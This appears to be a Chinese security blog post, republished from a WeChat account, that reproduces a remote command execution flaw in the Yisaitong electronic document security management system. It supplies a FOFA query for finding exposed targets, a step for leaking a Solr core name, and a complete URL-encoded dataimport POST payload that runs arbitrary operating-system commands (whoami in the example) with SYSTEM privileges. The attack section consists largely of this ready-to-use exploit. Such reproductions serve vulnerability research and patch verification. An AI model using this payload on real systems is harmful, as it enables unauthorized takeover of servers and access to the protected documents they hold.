亿赛通 电子文档安全管理系统远程命令执行复现

  • A+
所属分类:安全文章


1、描述


亿赛通 电子文档安全管理系统 dataimport 存在远程命令执行漏洞,攻击者通过构造特定的请求可执行任意命令


2、影响范围



亿赛通电子文档安全管理系统







3、FOFA


title="电子文档安全管理系统"







登录界面如下:

亿赛通 电子文档安全管理系统远程命令执行复现

首先我们需要访问以下URL来获取一个name的值:

/solr/admin/cores

亿赛通 电子文档安全管理系统远程命令执行复现

然后我们需要打开三剑客之一的BURP

使用POST请求,请求以下URL:

/solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20

其中开头的/sorl/**/dataimport之中的*为刚刚的name值。

仔细查看后面的代码,我这里填写的whoami,在那里替换成其他命令即可。

然后再填写POST一个xml文件流,为:

<?xml version="1.0" encoding="UTF-8"?>        <RDF>        <item/>        </RDF>

我这里只为测试,执行whoami命令

亿赛通 电子文档安全管理系统远程命令执行复现

可以看到返回了系统权限,NT也就是windows系统。



亿赛通 电子文档安全管理系统远程命令执行复现

扫取二维码获取

更多精彩

亿赛通 电子文档安全管理系统远程命令执行复现

Qingy之安全

亿赛通 电子文档安全管理系统远程命令执行复现




亿赛通 电子文档安全管理系统远程命令执行复现

点个在看你最好看






本文始发于微信公众号(Qingy之安全):亿赛通 电子文档安全管理系统远程命令执行复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: